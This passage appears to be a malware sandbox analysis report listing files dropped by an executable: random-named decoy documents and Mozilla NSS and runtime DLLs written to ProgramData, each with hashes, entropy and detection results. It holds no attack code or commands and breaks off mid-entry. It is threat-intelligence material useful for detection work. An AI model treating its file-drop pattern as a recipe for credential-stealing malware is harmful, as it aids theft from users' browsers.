SHA1:	EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
SHA-256:	F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
SHA-512:	10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
Malicious:	false
Preview:	RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC

C:\ProgramData\RAYHIWGKDI.xlsx

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69782189124949
Encrypted:	false
SSDEEP:	24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
MD5:	0640503E533EFB11CC70F43D2FFF4E26
SHA1:	EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
SHA-256:	F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
SHA-512:	10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
Malicious:	false
Preview:	RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC

C:\ProgramData\SFPUSAFIOL.docx

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696913287597031
Encrypted:	false
SSDEEP:	24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
MD5:	44ECF9E98785299129B35CBDBCAB909B
SHA1:	4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
SHA-256:	06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
SHA-512:	1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
Malicious:	false
Preview:	SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW

C:\ProgramData\SUAVTZKNFL.xlsx

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69422273140364
Encrypted:	false
SSDEEP:	24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
MD5:	A686C2E2230002C3810CB3638589BF01
SHA1:	4B764DD14070E52A2AC0458F401CDD5724E714FB
SHA-256:	38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
SHA-512:	1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
Malicious:	false
Preview:	SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

C:\ProgramData\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\ProgramData\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\ProgramData\XZXHAVGRAG.xlsx

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: ipR98bCqps.exe, Detection: malicious, Browse Filename: 5SLBlv4aUS.exe, Detection: malicious, Browse Filename: XAcuSo8KDa.exe, Detection: malicious, Browse Filename: WF2R8Bsptu.exe, Detection: malicious, Browse Filename: 5F25UVdGxt.exe, Detection: malicious, Browse Filename: f0FSseHktD.exe, Detection: malicious, Browse Filename: wipOhNpHIG.exe, Detection: malicious, Browse Filename: 8OeyVwIM3t.exe, Detection: malicious, Browse Filename: f6pwu0HWXe.exe, Detection: malicious, Browse Filename: V9TdcUeNlV.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: ipR98bCqps.exe, Detection: malicious, Browse Filename: 5SLBlv4aUS.exe, Detection: malicious, Browse Filename: XAcuSo8KDa.exe, Detection: malicious, Browse Filename: WF2R8Bsptu.exe, Detection: malicious, Browse Filename: 5F25UVdGxt.exe, Detection: malicious, Browse Filename: f0FSseHktD.exe, Detection: malicious, Browse Filename: wipOhNpHIG.exe, Detection: malicious, Browse Filename: 8OeyVwIM3t.exe, Detection: malicious, Browse Filename: f6pwu0HWXe.exe, Detection: malicious, Browse Filename: V9TdcUeNlV.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
